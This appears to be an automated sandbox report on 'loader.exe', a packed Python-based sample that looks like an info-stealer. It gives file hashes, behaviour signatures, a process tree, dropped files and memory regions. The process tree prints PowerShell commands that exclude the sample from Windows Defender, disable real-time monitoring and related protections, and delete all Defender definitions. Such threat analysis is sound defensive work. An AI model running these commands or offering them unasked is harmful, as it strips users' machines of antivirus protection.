Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-11-2024 17:53

General

  • Target

    loader.exe

  • Size

    7.4MB

  • MD5

    e26f980e01937c11753a44cba974b75d

  • SHA1

    31b41b9a017dd34b971c32565c612aa10b3e98c3

  • SHA256

    f967660afa6c074af705058bd0e681c5a431e705b83149c6e54f5b04797ded19

  • SHA512

    df8db54b06d8abaa5c25cf0dfd94fafe5662f55edebb7c60755bbeeafc73a3ef72b694a646635dd592e9af355f3533d2818528bc673a2f43e6a04a38239c9b69

  • SSDEEP

    196608:cWxteurErvI9pWjgaAnajMsK23fQC//OoLxh:zteurEUWjJjYoo4jLxh

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Loads dropped DLL 17 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • UPX packed file 50 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1688
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2328

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    d28a889fd956d5cb3accfbaf1143eb6f

    SHA1

    157ba54b365341f8ff06707d996b3635da8446f7

    SHA256

    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

    SHA512

    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\VCRUNTIME140.dll

    Filesize

    116KB

    MD5

    be8dbe2dc77ebe7f88f910c61aec691a

    SHA1

    a19f08bb2b1c1de5bb61daf9f2304531321e0e40

    SHA256

    4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

    SHA512

    0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_bz2.pyd

    Filesize

    48KB

    MD5

    980eff7e635ad373ecc39885a03fbdc3

    SHA1

    9a3e9b13b6f32b207b065f5fcf140aecfd11b691

    SHA256

    b4411706afc8b40a25e638a59fe1789fa87e1ce54109ba7b5bd84c09c86804e1

    SHA512

    241f9d3e25e219c7b9d12784ab525ab5ded58ca623bc950027b271c8dfb7c19e13536f0caf937702f767413a6d775bed41b06902b778e4bad2946917e16ad4ef

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_ctypes.pyd

    Filesize

    59KB

    MD5

    a8cb7698a8282defd6143536ed821ec9

    SHA1

    3d1b476b9c042d066de16308d99f1633393a497a

    SHA256

    40d53a382a78b305064a4f4df50543d2227679313030c9edf5ee82af23bf8f4a

    SHA512

    1445ae7dc7146afbe391e131baff456445d7e96a3618bfef36dc39af978dd305e3a294acd62ee91a050812c321a9ec298085c7ad4eb9b81e2e40e23c5a85f2cc

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_decimal.pyd

    Filesize

    105KB

    MD5

    ccfad3c08b9887e6cea26ddca2b90b73

    SHA1

    0e0fb641b386d57f87e69457faf22da259556a0d

    SHA256

    bad3948151d79b16776db9a4a054033a6f2865cb065f53a623434c6b5c9f4aad

    SHA512

    3af88779db58dcae4474c313b7d55f181f0678c24c16240e3b03721b18b66bdfb4e18d73a3cef0c954d0b8e671cf667fc5e91b5f1027de489a7039b39542b8ca

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_hashlib.pyd

    Filesize

    35KB

    MD5

    89f3c173f4ca120d643aab73980ade66

    SHA1

    e4038384b64985a978a6e53142324a7498285ec4

    SHA256

    95b1f5eff9d29eb6e7c6ed817a12ca33b67c76acea3cb4f677ec1e6812b28b67

    SHA512

    76e737552be1ce21b92fa291777eac2667f2cfc61ae5eb62d133c89b769a8d4ef8082384b5c819404b89a698fcc1491c62493cf8ff0dcc65e01f96b6f7b5e14f

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_lzma.pyd

    Filesize

    86KB

    MD5

    05adb189d4cfdcacb799178081d8ebcb

    SHA1

    657382ad2c02b42499e399bfb7be4706343cecab

    SHA256

    87b7bae6b4f22d7d161aefae54bc523d9c976ea2aef17ee9c3cf8fe958487618

    SHA512

    13fc9204d6f16a6b815addf95c31ea5c543bf8608bfcc5d222c7075dd789551a202ae442fddc92ea5919ecf58ba91383a0f499182b330b98b240152e3aa868c5

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_queue.pyd

    Filesize

    26KB

    MD5

    fc796fcde996f78225a4ec1bed603606

    SHA1

    5389f530aaf4bd0d4fce981f57f68a67fe921ee1

    SHA256

    c7c598121b1d82eb710425c0dc1fc0598545a61ffb1dd41931bb9368fb350b93

    SHA512

    4d40e5a4ab266646bedacf4fde9674a14795dcfb72aae70a1c4c749f7a9a4f6e302a00753fe0446c1d7cc90caee2d37611d398fdc4c68e48c8bc3637dfd57c15

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_socket.pyd

    Filesize

    44KB

    MD5

    f8d03997e7efcdd28a351b6f35b429a2

    SHA1

    1a7ae96f258547a14f6e8c0defe127a4e445206d

    SHA256

    aef190652d8466c0455311f320248764acbff6109d1238a26f8983ce86483bf1

    SHA512

    40c9bce421c7733df37558f48b8a95831cc3cf3e2c2cdf40477b733b14bd0a8a0202bc8bc95f39fcd2f76d21deac21ad1a4d0f6218b8f8d57290968163effef8

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_sqlite3.pyd

    Filesize

    57KB

    MD5

    3d85e2aa598468d9449689a89816395e

    SHA1

    e6d01b535c8fc43337f3c56bfc0678a64cf89151

    SHA256

    6f0c212cb7863099a7ce566a5cf83880d91e38a164dd7f9d05d83cce80fa1083

    SHA512

    a9a527fc1fcce3ffe95e9e6f4991b1a7156a5ca35181100ea2a25b42838b91e39dd9f06f0efedb2453aa87f90e134467a7662dbbe22c6771f1204d82cc6cea82

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\_ssl.pyd

    Filesize

    65KB

    MD5

    615bfc3800cf4080bc6d52ac091ec925

    SHA1

    5b661997ed1f0a6ea22640b11af71e0655522a10

    SHA256

    1819dd90e26aa49eb40119b6442e0e60ec95d3025e9c863778dcc6295a2b561f

    SHA512

    1198426b560044c7f58b1a366a9f8afcde1b6e45647f9ae9c451fb121708aa4371673815be1d35ad1015029c7c1c6ea4755eb3701dbf6f3f65078a18a1daeacb

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\base_library.zip

    Filesize

    1.3MB

    MD5

    8dad91add129dca41dd17a332a64d593

    SHA1

    70a4ec5a17ed63caf2407bd76dc116aca7765c0d

    SHA256

    8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783

    SHA512

    2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\blank.aes

    Filesize

    108KB

    MD5

    3321d644d8562c6d2b8de7a82780a952

    SHA1

    04832103da1ec5803544554e41c542c139b32f91

    SHA256

    dd12fce42abce902c9dcb95b619c5d268fdd81eaf0528567fc9f7b1d532ca52e

    SHA512

    6692a17e70bc5af8bf60920629471246002903a3f597498f1d377103c4e44404b82e89e2a45fd4d79a299bb3a245a2626f888779c1ff9446026d60178699dbf8

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\blank.aes

    Filesize

    108KB

    MD5

    ce352854f6dedcde500f7b988d463be0

    SHA1

    239f5a1e64c8b1b9e156c5fbf21482afad6f034a

    SHA256

    f2a63f6152b04ff8b28ef5d8461931bf68b9a4864b957227156205fd5cf94b04

    SHA512

    58783c781a71831f3f4eda668959b6d68254322ba0bfaaa1757f200bdfa98c2419830e63aaaa2a83fa9bbf70a7110055eadfe1bad8c2d7ea790fd85e57e34531

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\libcrypto-3.dll

    Filesize

    1.6MB

    MD5

    7f1b899d2015164ab951d04ebb91e9ac

    SHA1

    1223986c8a1cbb57ef1725175986e15018cc9eab

    SHA256

    41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

    SHA512

    ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\libffi-8.dll

    Filesize

    29KB

    MD5

    08b000c3d990bc018fcb91a1e175e06e

    SHA1

    bd0ce09bb3414d11c91316113c2becfff0862d0d

    SHA256

    135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

    SHA512

    8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\libssl-3.dll

    Filesize

    222KB

    MD5

    264be59ff04e5dcd1d020f16aab3c8cb

    SHA1

    2d7e186c688b34fdb4c85a3fce0beff39b15d50e

    SHA256

    358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

    SHA512

    9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\python312.dll

    Filesize

    1.7MB

    MD5

    fb8bedf8440eb432c9f3587b8114abc0

    SHA1

    136bb4dd38a7f6cb3e2613910607131c97674f7c

    SHA256

    cb627a3c89de8e114c95bda70e9e75c73310eb8af6cf3a937b1e3678c8f525b6

    SHA512

    b632235d5f60370efa23f8c50170a8ac569ba3705ec3d515efcad14009e0641649ab0f2139f06868024d929defffffefb352bd2516e8cd084e11557b31e95a63

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\rar.exe

    Filesize

    615KB

    MD5

    9c223575ae5b9544bc3d69ac6364f75e

    SHA1

    8a1cb5ee02c742e937febc57609ac312247ba386

    SHA256

    90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

    SHA512

    57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\rarreg.key

    Filesize

    456B

    MD5

    4531984cad7dacf24c086830068c4abe

    SHA1

    fa7c8c46677af01a83cf652ef30ba39b2aae14c3

    SHA256

    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

    SHA512

    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\select.pyd

    Filesize

    25KB

    MD5

    08b4caeaccb6f6d27250e6a268c723be

    SHA1

    575c11f72c8d0a025c307cb12efa5cb06705561d

    SHA256

    bd853435608486555091146ab34b71a9247f4aaa9f7ecfbc3b728a3e3efde436

    SHA512

    9b525395dec028ef3286c75b88f768e5d40195d4d5adab0775c64b623345d81da1566596cc61a460681bc0adba9727afc96c98ad2e54ff371919f3db6d369b0c

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\sqlite3.dll

    Filesize

    644KB

    MD5

    482b3f8adf64f96ad4c81ae3e7c0fb35

    SHA1

    91891d0eabb33211970608f07850720bd8c44734

    SHA256

    1fbdb4020352e18748434ef6f86b7346f48d6fb9a72c853be7b05e0e53ebbb03

    SHA512

    5de56e00ab6f48ffc836471421d4e360d913a78ee8e071896a2cd951ff20f7a4123abd98adf003ce166dcc82aad248ebf8b63e55e14eceec8aa9a030067c0d1d

  • C:\Users\Admin\AppData\Local\Temp\_MEI24082\unicodedata.pyd

    Filesize

    295KB

    MD5

    27b3af74ddaf9bca239bf2503bf7e45b

    SHA1

    80a09257f9a4212e2765d492366ed1e60d409e04

    SHA256

    584c2ecea23dfc72ab793b3fd1059b3ea6fdf885291a3c7a166157cf0e6491c4

    SHA512

    329c3a9159ea2fdce5e7a28070bcf9d6d67eca0b27c4564e5250e7a407c8b551b68a034bfde9d8d688fa5a1ae6e29e132497b3a630796a97b464762ca0d81bb7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qyximelf.qll.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1688-107-0x00007FFEF4A40000-0x00007FFEF5501000-memory.dmp

    Filesize

    10.8MB

  • memory/1688-86-0x00007FFEF4A40000-0x00007FFEF5501000-memory.dmp

    Filesize

    10.8MB

  • memory/1688-84-0x00007FFEF4A40000-0x00007FFEF5501000-memory.dmp

    Filesize

    10.8MB

  • memory/1688-83-0x00000240D6330000-0x00000240D6352000-memory.dmp

    Filesize

    136KB

  • memory/1688-82-0x00007FFEF4A43000-0x00007FFEF4A45000-memory.dmp

    Filesize

    8KB

  • memory/4844-74-0x00007FFF09650000-0x00007FFF09675000-memory.dmp

    Filesize

    148KB

  • memory/4844-108-0x00007FFEF6960000-0x00007FFEF7025000-memory.dmp

    Filesize

    6.8MB

  • memory/4844-66-0x00007FFF05910000-0x00007FFF05943000-memory.dmp

    Filesize

    204KB

  • memory/4844-73-0x000002974C6C0000-0x000002974CBE9000-memory.dmp

    Filesize

    5.2MB

  • memory/4844-72-0x00007FFEF56E0000-0x00007FFEF5C09000-memory.dmp

    Filesize

    5.2MB

  • memory/4844-70-0x00007FFEF6960000-0x00007FFEF7025000-memory.dmp

    Filesize

    6.8MB

  • memory/4844-80-0x00007FFEF55C0000-0x00007FFEF56DB000-memory.dmp

    Filesize

    1.1MB

  • memory/4844-79-0x00007FFF095D0000-0x00007FFF095DD000-memory.dmp

    Filesize

    52KB

  • memory/4844-78-0x00007FFF058F0000-0x00007FFF05904000-memory.dmp

    Filesize

    80KB

  • memory/4844-81-0x00007FFF0BC10000-0x00007FFF0BC2A000-memory.dmp

    Filesize

    104KB

  • memory/4844-64-0x00007FFF0A3B0000-0x00007FFF0A3BD000-memory.dmp

    Filesize

    52KB

  • memory/4844-62-0x00007FFF05BA0000-0x00007FFF05BB9000-memory.dmp

    Filesize

    100KB

  • memory/4844-60-0x00007FFEF6310000-0x00007FFEF648E000-memory.dmp

    Filesize

    1.5MB

  • memory/4844-85-0x00007FFF05BC0000-0x00007FFF05BE4000-memory.dmp

    Filesize

    144KB

  • memory/4844-58-0x00007FFF05BC0000-0x00007FFF05BE4000-memory.dmp

    Filesize

    144KB

  • memory/4844-56-0x00007FFF0BC10000-0x00007FFF0BC2A000-memory.dmp

    Filesize

    104KB

  • memory/4844-54-0x00007FFF057A0000-0x00007FFF057CD000-memory.dmp

    Filesize

    180KB

  • memory/4844-71-0x00007FFEF5C10000-0x00007FFEF5CDD000-memory.dmp

    Filesize

    820KB

  • memory/4844-133-0x00007FFEF56E0000-0x00007FFEF5C09000-memory.dmp

    Filesize

    5.2MB

  • memory/4844-36-0x00007FFF0F060000-0x00007FFF0F06F000-memory.dmp

    Filesize

    60KB

  • memory/4844-30-0x00007FFF09650000-0x00007FFF09675000-memory.dmp

    Filesize

    148KB

  • memory/4844-25-0x00007FFEF6960000-0x00007FFEF7025000-memory.dmp

    Filesize

    6.8MB

  • memory/4844-132-0x00007FFEF5C10000-0x00007FFEF5CDD000-memory.dmp

    Filesize

    820KB

  • memory/4844-131-0x00007FFF05910000-0x00007FFF05943000-memory.dmp

    Filesize

    204KB

  • memory/4844-130-0x00007FFF0A3B0000-0x00007FFF0A3BD000-memory.dmp

    Filesize

    52KB

  • memory/4844-129-0x00007FFF05BA0000-0x00007FFF05BB9000-memory.dmp

    Filesize

    100KB

  • memory/4844-128-0x00007FFEF6310000-0x00007FFEF648E000-memory.dmp

    Filesize

    1.5MB

  • memory/4844-127-0x00007FFF05BC0000-0x00007FFF05BE4000-memory.dmp

    Filesize

    144KB

  • memory/4844-126-0x00007FFF0BC10000-0x00007FFF0BC2A000-memory.dmp

    Filesize

    104KB

  • memory/4844-125-0x00007FFF057A0000-0x00007FFF057CD000-memory.dmp

    Filesize

    180KB

  • memory/4844-124-0x00007FFF0F060000-0x00007FFF0F06F000-memory.dmp

    Filesize

    60KB

  • memory/4844-123-0x00007FFF09650000-0x00007FFF09675000-memory.dmp

    Filesize

    148KB

  • memory/4844-122-0x00007FFEF55C0000-0x00007FFEF56DB000-memory.dmp

    Filesize

    1.1MB

  • memory/4844-121-0x00007FFF095D0000-0x00007FFF095DD000-memory.dmp

    Filesize

    52KB

  • memory/4844-120-0x00007FFF058F0000-0x00007FFF05904000-memory.dmp

    Filesize

    80KB